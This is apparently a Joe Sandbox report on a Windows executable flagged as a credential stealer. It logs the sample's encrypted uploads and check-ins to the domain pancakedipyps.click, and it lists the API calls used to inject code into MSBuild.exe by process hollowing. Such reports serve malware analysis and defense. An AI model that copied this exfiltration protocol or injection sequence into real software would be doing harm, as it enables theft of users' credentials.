2024-12-18 12:49:58 UTC	1050	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=edd3g5esq6meii4miselk3gqti; expires=Sun, 13-Apr-2025 06:36:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pH1oW2Ii%2FoeFBqXQnvCYgro0AKzJdBhxve4wKxAyDPecVEK1NdbvHDRiRTVn%2BqEIL0YbwYhURTVOeva1T3s0kOL9aDqM%2FM2PpzGLJRlmlMH681jSks2%2B941%2BH%2BBRfzrqoT%2BQFRY%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f46a11fbbefa1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2122&min_rtt=2023&rtt_var=830&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21494&delivery_rate=1443400&cwnd=165&unsent_bytes=0&cid=62eaf3ab8421fabf&ts=895&x=0"
2024-12-18 12:49:58 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:49:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49719	104.21.23.76	443	7908	C:\Users\user\Desktop\random.exe.10.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:50:00 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VOGS9FMXKWB6KHV3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1207 Host: pancakedipyps.click
2024-12-18 12:50:00 UTC	1207	OUT	Data Raw: 2d 2d 56 4f 47 53 39 46 4d 58 4b 57 42 36 4b 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 4f 47 53 39 46 4d 58 4b 57 42 36 4b 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 4f 47 53 39 46 4d 58 4b 57 42 36 4b 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 56 4f 47 Data Ascii: --VOGS9FMXKWB6KHV3Content-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--VOGS9FMXKWB6KHV3Content-Disposition: form-data; name="pid"1--VOGS9FMXKWB6KHV3Content-Disposition: form-data; name="lid"FATE99--test--VOG
2024-12-18 12:50:01 UTC	1045	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:50:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t4rrnl4mrn769eh5bnu7bnlh9d; expires=Sun, 13-Apr-2025 06:36:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7zl0kKfvxHZNii5b1UCAi8Q7Gii7B8tl%2BJPSvT7B9dh%2BL%2B26nG8Hzb6Akl%2BIdq2UsE358capTpLdRLVwbZuBFElwfSyYH2o%2BoSF%2BxXX8Ud1x4mXHVlS3aWrG0%2BLXzuT8ccO1LjWm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f46b3cd0942aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1695&rtt_var=657&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2125&delivery_rate=1638608&cwnd=195&unsent_bytes=0&cid=b45482206e363272&ts=783&x=0"
2024-12-18 12:50:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:50:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49721	104.21.23.76	443	7908	C:\Users\user\Desktop\random.exe.10.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:50:03 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SGY5F9G8KXVC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 547865 Host: pancakedipyps.click
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: 2d 2d 53 47 59 35 46 39 47 38 4b 58 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 47 59 35 46 39 47 38 4b 58 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 47 59 35 46 39 47 38 4b 58 56 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 53 47 59 35 46 39 47 38 4b 58 56 43 0d 0a 43 Data Ascii: --SGY5F9G8KXVCContent-Disposition: form-data; name="hwid"071A6BC798D46C7BAC8923850305D13E--SGY5F9G8KXVCContent-Disposition: form-data; name="pid"1--SGY5F9G8KXVCContent-Disposition: form-data; name="lid"FATE99--test--SGY5F9G8KXVCC
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: e1 a4 45 37 ed 63 76 1f 53 82 6e b7 91 20 45 6a ba 93 c7 75 bc 6a 05 26 70 86 70 f9 b2 fe 05 d1 67 e4 fb 5a 62 ed ba e8 18 15 de ac 8b ca 4e e6 3d f5 d8 8b d1 28 36 fe bb c1 62 22 31 e9 b4 19 ca 22 26 d4 8f d8 6f a0 c5 22 2d 88 a3 6e 70 6d 5d 76 8e 57 dd 5b fb 45 e0 64 07 0e 1c 93 6d 19 13 03 e6 15 28 24 53 71 b6 57 ff fd ad 45 7f 21 4f 66 28 79 d6 99 4e 09 5c 7f a1 8e 02 14 df ad 8f 61 b8 5b 87 21 f0 7a eb e6 86 bf 13 85 03 e8 af 21 78 3f c6 a1 d0 f5 85 3d 12 74 33 57 34 f5 ca 80 3a 08 0d 98 1f 58 e8 d2 0e 11 f5 00 eb 4d fd 52 09 fc b9 b0 79 5b 21 4e 9a 13 ef b7 f0 c5 9b 9a 26 55 ff 57 e3 b4 b0 30 34 27 72 06 f4 ca fc 94 fa 93 40 cb 00 3f 20 8c 60 86 9f 1b fe 5f 7d 59 53 33 02 82 a0 32 61 99 21 47 aa 2d 80 d6 de 5f 05 93 1e 5f b8 03 fb df 30 45 be 91 ef Data Ascii: E7cvSn Ejuj&ppgZbN=(6b"1"&o"-npm]vW[Edm($SqWE!Of(yN\a[!z!x?=t3W4:XMRy[!N&UW04'r@? `_}YS32a!G-__0E
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: 47 15 83 df b4 ef eb 55 93 70 fc 23 9a c1 55 f4 27 ff 08 33 92 41 e0 f8 13 88 a9 24 fa 8f 1c 93 34 56 75 6f a3 bf 9b 46 35 34 da 26 a7 e4 9c 15 b3 aa 37 46 7e 55 91 31 b9 c1 b3 70 f6 62 4b 6a 38 61 fb 17 6c b3 8b c0 77 4f 07 bb 9e 37 e3 d6 6c 91 4b 53 32 1e d0 a4 ef 3d c5 71 47 1b 3a fe 2a 33 e1 bb 03 36 b2 a4 33 ca 23 9a 5e 28 30 2a 9b 7d f7 f7 82 a4 85 fa 61 ea 51 a1 5d 95 48 51 57 08 13 fa a6 dc c7 a5 e4 f9 2e 90 ec 23 7d f1 d7 52 18 84 4d a2 e1 4b 05 a2 47 d9 1d fa 69 ad de 0b 20 9b 58 d0 d0 a0 9f 2d 85 88 93 61 ab 9b 4e a3 a2 b5 3e 77 8c f9 9b c6 51 3a 4b 15 b3 79 be 23 b5 5c a3 d2 c5 07 89 48 86 da dc fd 42 bd 11 84 63 22 bb 45 64 fd 71 d2 19 19 ef b0 03 72 01 f6 10 f8 8d 1f cc 39 eb bd e1 cb ae b4 4d ab ec 8c 42 f3 35 b7 6c 37 6a cf 6d 0f f2 df 9b Data Ascii: GUp#U'3A$4VuoF54&7F~U1pbKj8alwO7lKS2=qG:363#^(0}aQ]HQW.#}RMKGi X-aN>wQ:Ky#\HBc"Edqr9MB5l7jm
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: ce 78 49 18 01 60 47 31 ad e3 d4 aa 97 ca 92 b9 e0 87 bf 78 31 0b cf a1 5d dc 4b b1 18 98 ce 7d 30 62 7b 22 10 5a 2b 16 50 3d 49 6e d8 b2 92 03 b7 77 69 15 73 2e df 41 03 da e4 81 92 5b ae 17 20 ae f7 4a 22 98 a5 0b 42 c0 a3 9f ed f3 18 17 50 54 3e 1b c0 f4 c9 f2 ff 36 32 e5 3a b0 dc d3 a5 18 02 4f 60 76 11 95 0e f2 48 12 c1 e9 ac 5e 55 22 ff 2d d0 c5 8b 48 59 9a d6 53 d8 a2 3d 7b ec 1c df c4 b2 28 58 39 2a 65 0d 31 a6 25 40 21 4c ef e5 05 af 0b 05 80 d3 21 3f ea 74 e3 1b fe 89 83 20 9f 40 cb 41 e4 6e ac 8d e5 bb 9f 39 e7 6d 01 c5 b9 fe ae c8 4e 06 06 3e 50 ba 35 c5 aa 04 dc a6 77 b0 90 d0 0e 7f 9d 30 67 06 f6 56 82 26 6a fd a5 2b a7 96 5f e2 e0 4a 4b d7 dd 4c fc b1 1b 54 54 8f 70 8c 04 18 56 62 1c 41 95 a9 aa 6c b4 dc 13 7c 86 84 bb da ac 5c c9 2e e4 b9 Data Ascii: xI`G1x1]K}0b{"Z+P=Inwis.A[ J"BPT>62:O`vH^U"-HYS={(X9*e1%@!L!?t @An9mN>P5w0gV&j+_JKLTTpVbAl\|\.
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: 21 ba a1 2c c1 98 7d 79 da 07 ee 1f f6 4d 5c 6d c5 aa 4d f3 d2 b9 0f 6c ea bc 9c d5 69 e7 9e 64 07 92 ea 1e 2e eb 85 1b b7 61 1b d6 e9 09 9b 54 7a 45 e2 a2 78 7c 6b 5a 96 7e c2 85 4e 79 28 b9 22 23 aa fa e5 5b 0a db 9a 77 38 33 fe 10 e2 19 96 4e 29 31 5a 4f 50 44 42 1c ec ef 36 de 6a 70 ef 3d e1 c4 fb 57 3e 06 33 aa 74 32 ff ce b1 4c a1 ed 41 87 1a b6 3a 80 7b b9 58 3e 9c 75 40 6b b8 91 f1 b7 d0 98 f4 c1 2c 46 dc e4 dd 97 a2 41 7c bb 2f e6 4f d6 18 28 d2 7e 24 d9 b5 3b e8 82 de 3a bf 79 dd 43 3d 4f af c6 87 14 df b1 c1 05 bd b7 94 3a 4f 14 e4 39 53 85 a4 24 98 e2 fc f9 c7 6b ff ff d0 be 49 b9 99 d2 79 71 e2 49 b3 9e b6 43 65 14 93 f7 1e ae 10 b6 50 88 d9 3e 32 3d 71 f2 43 ca 80 59 15 03 b1 bf 42 a5 b9 04 b8 64 04 44 91 40 40 44 48 a9 f1 bb 54 f4 83 bb c7 Data Ascii: !,}yM\mMlid.aTzEx\|kZ~Ny("#[w83N)1ZOPDB6jp=W>3t2LA:{X>u@k,FA\|/O(~$;:yC=O:O9S$kIyqICeP>2=qCYBdD@@DHT
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: 60 98 a0 da e2 6f 42 15 dc 68 98 7b 68 7a 5f a8 f4 c7 78 bd c7 40 a9 cb dc e7 97 d5 3a 8b a6 e1 c6 53 ab 5e 0f b2 8c 10 de b5 63 58 9b 57 66 70 43 71 0d 3d 35 94 57 0a 10 ae 7d 10 25 e9 0e d6 7e 2f db f2 cf 09 12 63 72 66 53 e9 9b 74 2e 55 fc 5e a6 74 34 e9 a7 88 50 1d 3b 63 60 cb e3 e3 ba bd 78 94 fd b6 1a 80 d8 e5 87 f7 96 d3 a7 d9 c3 df 0b 62 43 24 e6 ce d6 c1 b2 20 98 37 e7 1c 66 e1 ff 28 45 45 c0 fa 89 c1 c0 f3 78 55 59 3f ce 37 73 5b 25 0c 9c 80 0b cb 33 7f 78 6a 8e b5 e9 1f 8f f6 3f 07 bc 4e 21 40 81 17 5c 3c 0a 98 55 61 87 f7 9d 24 e0 3d 53 a0 00 88 eb 90 8f ee b8 6b a6 5c 75 79 6c 6f d0 ab 9c 77 57 e3 c8 b4 95 b3 82 28 51 94 e5 a5 9b 15 cf 1f 45 95 75 bf b5 78 2d 9b 23 3d 0a 72 3c 9a a3 52 aa c8 ff b5 e5 a4 69 41 44 60 ab cb 2f be dd 71 eb dd f9 Data Ascii: `oBh{hz_x@:S^cXWfpCq=5W}%~/crfSt.U^t4P;c`xbC$ 7f(EExUY?7s[%3xj?N!@\<Ua$=Sk\uylowW(QEux-#=r<RiAD`/q
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: f1 15 e3 68 20 4b b3 3d 64 ee 6d af 03 29 29 44 06 65 2c 50 94 87 eb aa f5 91 5e b2 d8 5a 45 8b a1 5f cb fa a1 7e 47 c7 aa cf ac 58 7c c8 6e bc 11 28 4c c6 b5 f3 94 11 82 46 6f 17 b4 22 7c d3 e3 2e ee 1a de 0e 9e 0b da 0d 52 5f c9 eb 70 06 1d 51 32 3a 29 fe 90 16 48 bc 1f 4c b9 91 65 69 32 b3 38 76 ae c5 ac 39 90 27 93 64 c4 3a be af e6 90 f0 45 6d e6 fe a5 59 e8 48 d3 9c 79 12 37 92 af af 64 35 15 7f 54 31 22 11 3d 63 74 bf 15 7d 12 e4 be a5 a7 a9 a5 10 ad ad 3e 64 71 9c e5 ad 4a 6b 0a d1 69 23 8c 36 58 19 8d c7 f6 c4 e7 d5 99 0b 4c 9c 0a 98 12 e5 85 c4 ca dd 80 a1 89 df d2 52 3c c1 cf a4 64 5c 1b 7d fd d2 5f 40 26 f0 65 76 ab 6c 43 55 2b 6a 0b ea 42 80 4c 58 24 d5 90 f7 69 a3 a0 f8 1c a7 b2 ff a6 8a 2a 80 c4 6f d0 ac d5 7f 5b 5e 03 38 66 b8 c3 ca 70 f6 Data Ascii: h K=dm))De,P^ZE_~GX\|n(LFo"\|.R_pQ2:)HLei28v9'd:EmYHy7d5T1"=ct}>dqJki#6XLR<d\}_@&evlCU+jBLX$i*o[^8fp
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: 0b 04 9a c7 6b a5 e3 56 e7 d5 58 c3 73 23 1c 0f 95 6b 82 1f 14 1f 85 b0 f5 62 83 99 57 43 f4 bf 93 87 fc 4f 93 0d d2 6f 46 0a 13 ee 7a f5 7e 24 d5 74 f9 33 91 16 20 9a 82 e2 73 20 4f 2b 35 54 e9 63 d4 f4 85 26 c8 a5 0f a2 cd b5 26 68 66 04 c5 ec 2c a9 20 3c aa ef 61 64 29 ba a7 15 5c e8 8d 47 58 f8 08 14 84 d9 75 45 f5 68 91 65 e9 8f 31 17 06 31 43 ca f3 e5 1e 9f 8a ed 18 1c 46 79 26 72 be ad e3 7d 16 f7 ba d2 81 4e 33 ef e8 45 e7 65 9d d7 08 99 07 e6 fb 32 78 6e c1 f9 85 85 a3 07 aa 2f 57 77 ac f1 be 19 57 2d 26 7e c4 e5 32 fb 14 36 ed 7e 78 c2 8c ed 60 74 00 6e 6d 76 8c ba 76 0e 50 83 51 81 0b 11 c1 76 13 99 94 25 b6 4a fe c8 2d 3d e7 f8 90 64 8d e1 89 eb f9 63 67 fa e7 88 75 4a 59 ee 4f 05 75 24 22 9f cf 93 92 04 cf c2 d6 09 39 c5 90 89 e0 25 f4 ce 49 Data Ascii: kVXs#kbWCOoFz~$t3 s O+5Tc&&hf, <ad)\GXuEhe11CFy&r}N3Ee2xn/WwW-&~26~x`tnmvvPQv%J-=dcguJYOu$"9%I
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: 47 11 8e 8d 2b 53 8e 63 be db c3 d9 c9 1c 7b 14 c8 76 32 c8 aa 80 ca 0b e8 b6 0c 9f 67 45 08 12 cd 8c 66 d4 8f e0 f9 18 4f 9d d6 22 f5 d8 02 a2 20 6a 2f 5f 4b 6e d1 97 03 71 bd 2b f2 8f 57 9b fe c1 b5 2e ab 0d 14 fb 91 d1 91 a5 8a 7f e7 c2 98 0c 6e c0 61 a3 9f c6 06 fd 82 39 57 8a 11 f0 fb 85 82 cb af 78 b1 f2 39 40 c9 75 a3 93 21 d7 b0 37 57 5f 95 c2 85 df 1e d6 22 68 a5 f0 1b 9e 1e de 0b 14 fe 3c a4 fa 00 7a 63 3c fc 58 1a 28 5c c1 1a 3a 82 5c 4a a1 a2 90 10 a9 68 8a fd e1 1a 68 8f a6 1d 3a 0b f5 ed 7d 5a 97 c8 e7 f1 8f ba ee da 15 fb 2e 2c de 59 7a 1c 7d fe 6a 76 ab 48 ac 1e be c6 4b 7d 47 94 0e 91 e2 2c 80 2c 0c 7d 01 a1 df 9e fe fb 4c 54 5f f0 bf 67 27 8a bb 48 ad 7c 5b 56 8a 41 51 c6 e1 76 04 09 ae d9 45 ed fa fb 56 b4 2d 34 ff 85 04 c7 4a 91 1a 81 Data Ascii: G+Sc{v2gEfO" j/_Knq+W.na9Wx9@u!7W_"h<zc<X(\:\Jhh:}Z.,Yz}jvHK}G,,}LT_g'H\|[VAQvEV-4J
2024-12-18 12:50:03 UTC	15331	OUT	Data Raw: fc 78 48 0d e0 ee e5 91 fa 67 35 3b da fb 2e ff 13 ef 88 61 dd f6 8f 0f 81 83 1b e2 97 f1 8b ce b8 8d 02 06 58 0c 7b 25 b8 b8 9d a7 ad a4 03 20 4e 15 26 50 79 31 65 9e 6b 18 cc 88 4f af 1c ae a9 5c 7c 06 fd 1a 0c 9b 3b 12 3c 57 bb 50 76 19 53 e0 af c7 70 9d b9 14 86 37 f4 28 34 18 1c 70 71 f5 f7 27 ae 47 3f 5e 5e da 3e 98 9f 6c 3a 3b 4e fd ed f5 d9 a4 63 50 d9 7f fe 12 0e 50 df df 8e 4f ac dc c8 7a 5b 89 49 0a 33 fe e0 e9 f1 61 e4 bb 6d 85 f0 ed 60 dc 0b 82 09 fb fc 50 c2 43 a8 99 8a df 3c a5 9e 8b 4f a1 d8 3d ab 7d bc 2c 44 ab bd 32 de f2 b0 16 ca a5 25 03 ca 9b 1d 9b 3d 6e d3 f7 dc 70 7d 1e f3 59 1b 42 7f 03 31 0e ed cb 51 0c ca 61 d5 5e 5e 19 5c 6d 79 40 2f 95 3b 4f e8 76 a5 f7 4c 7b 83 80 18 14 3c d7 9a 1c 00 7a 8e 25 22 0c 9a 62 86 e5 4e 9c ba 54 2d Data Ascii: xHg5;.aX{% N&Py1ekO\\|;<WPvSp7(4pq'G?^^>l:;NcPPOz[I3am`PC<O=},D2%=np}YB1Qa^^\my@/;OvL{<z%"bNT-
2024-12-18 12:50:07 UTC	1043	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:50:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c1lde4hn7i1gk845tjqgeqi8vq; expires=Sun, 13-Apr-2025 06:36:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x48glV1u4MrzUA5jS5%2Fv5qjvyBBhfLSr4qvOvGEdI2rvMN74HnCMDzKONZG3OLd7I%2FdU6cNkQeZfFvAO2ZtrJ8xHSH0oLVoXcZWyIA1OdsyBA0HCSEpcWxgFdoLSQIElMQn2zdYe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f46c3faa48c3c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3110&min_rtt=1975&rtt_var=1552&sent=196&recv=565&lost=0&retrans=0&sent_bytes=2848&recv_bytes=550343&delivery_rate=1478481&cwnd=224&unsent_bytes=0&cid=8de9f7807eccef16&ts=4597&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49723	104.21.23.76	443	7908	C:\Users\user\Desktop\random.exe.10.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:50:09 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: pancakedipyps.click
2024-12-18 12:50:09 UTC	81	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 30 37 31 41 36 42 43 37 39 38 44 34 36 43 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=071A6BC798D46C7BAC8923850305D13E
2024-12-18 12:50:11 UTC	1037	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:50:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6dsjb133p76n43qucrms0i1s6h; expires=Sun, 13-Apr-2025 06:36:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ap%2FjHHfayKmLeStK9J6iigGTFnudjaD0EQGGnwCzkfaJuBDjMfnuFqaBN05N3XGbpWxfiQN%2B0Gj4JOn1EwNfpN2Tx2IKZOR05GqMxycvEQV8R4LYqhOjUbsShbCZaO6o1cn%2BS30v"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f46e9bfd40c76-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1545&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=984&delivery_rate=1889967&cwnd=151&unsent_bytes=0&cid=7cda979f76b6d58b&ts=2789&x=0"
2024-12-18 12:50:11 UTC	54	IN	Data Raw: 33 30 0d 0a 47 44 55 79 46 4c 56 41 71 49 71 30 4f 68 5a 61 32 37 6f 41 43 48 73 77 32 45 70 6a 56 51 39 45 4d 55 4f 54 59 42 58 74 66 76 56 44 61 41 3d 3d 0d 0a Data Ascii: 30GDUyFLVAqIq0OhZa27oACHsw2EpjVQ9EMUOTYBXtfvVDaA==
2024-12-18 12:50:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:49:41
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\random.exe.10.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\random.exe.10.exe"
Imagebase:	0xe90000
File size:	776'832 bytes
MD5 hash:	AFD936E441BF5CBDB858E96833CC6ED3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:49:41
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:49:44
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\random.exe.10.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\random.exe.10.exe"
Imagebase:	0xe90000
File size:	776'832 bytes
MD5 hash:	AFD936E441BF5CBDB858E96833CC6ED3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1611561835.0000000000E04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.1611809499.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	1.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	22

Executed Functions

Function 00EB519E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00EB5110,00EB5100), ref: 00EB5334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00EB5347
Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 00EB5365
ReadProcessMemory.KERNELBASE(00000088,?,00EB5154,00000004,00000000), ref: 00EB5389
VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 00EB53B4
WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 00EB540C
WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 00EB5457
WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 00EB5495
Wow64SetThreadContext.KERNEL32(0000008C,01590000), ref: 00EB54D1
ResumeThread.KERNELBASE(0000008C), ref: 00EB54E0

Strings

VirtualAlloc, xrefs: 00EB5263
GetThreadContext, xrefs: 00EB5276
aryA, xrefs: 00EB51E2
GetP, xrefs: 00EB521E
Load, xrefs: 00EB51DA
WriteProcessMemory, xrefs: 00EB52AF
SetThreadContext, xrefs: 00EB52C2
TerminateProcess, xrefs: 00EB53C3
CreateProcessW, xrefs: 00EB5250
VirtualAllocEx, xrefs: 00EB529C
ResumeThread, xrefs: 00EB52D8
ReadProcessMemory, xrefs: 00EB5289
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00EB5333
ress, xrefs: 00EB5226

Memory Dump Source

Source File: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

